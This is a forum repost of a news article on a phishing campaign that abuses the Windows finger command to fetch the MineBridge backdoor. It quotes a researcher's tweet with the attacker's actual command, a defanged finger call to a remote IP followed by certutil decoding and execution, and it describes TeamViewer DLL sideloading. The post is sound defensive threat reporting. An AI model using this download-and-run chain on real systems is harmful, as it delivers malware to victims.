Windows Finger command abused by phishing to download malware

[silversurfer]

Content source

https://www.bleepingcomputer.com/news/security/windows-finger-command-abused-by-phishing-to-download-malware/

Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
The 'Finger' command is a utility that originated in Linux/Unix operating systems that allows a local user to retrieve a list of users on a remote machine or information about a particular remote user. In addition to Linux, Windows includes a finger.exe command that performs the same functionality.

This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.

VirusTotal ITW maldoc using finger.exe to download 2nd stage. Runs 'finger nc20@184[.]164[.]146[.]102' to pull down b64 encoded cert, certutil to decode, runs payload. Payload is VirusTotal.
— Kirk Sayre (@bigmacjpg) January 14, 2021​

Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.

Interesting, downloads a teamviewer executable and a malicious dll, sideloaded by teamviewer, containing MINEBRIDGE malware - The behaviour is the same, apart from the finger.exe, even the TLD c2 *.top of fireeye report - STOMP 2 DIS: Brilliance in the (Visual) BasicsVirusTotal pic.twitter.com/QdIuwbe2Gq
— Giuseppe `N3mes1s` (@gN3mes1s) January 15, 2021​

Windows Finger command abused by phishing to download malware

Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.

www.bleepingcomputer.com

 

[ForgottenSeer 85179]

Looks like it's time to update FirewallHardening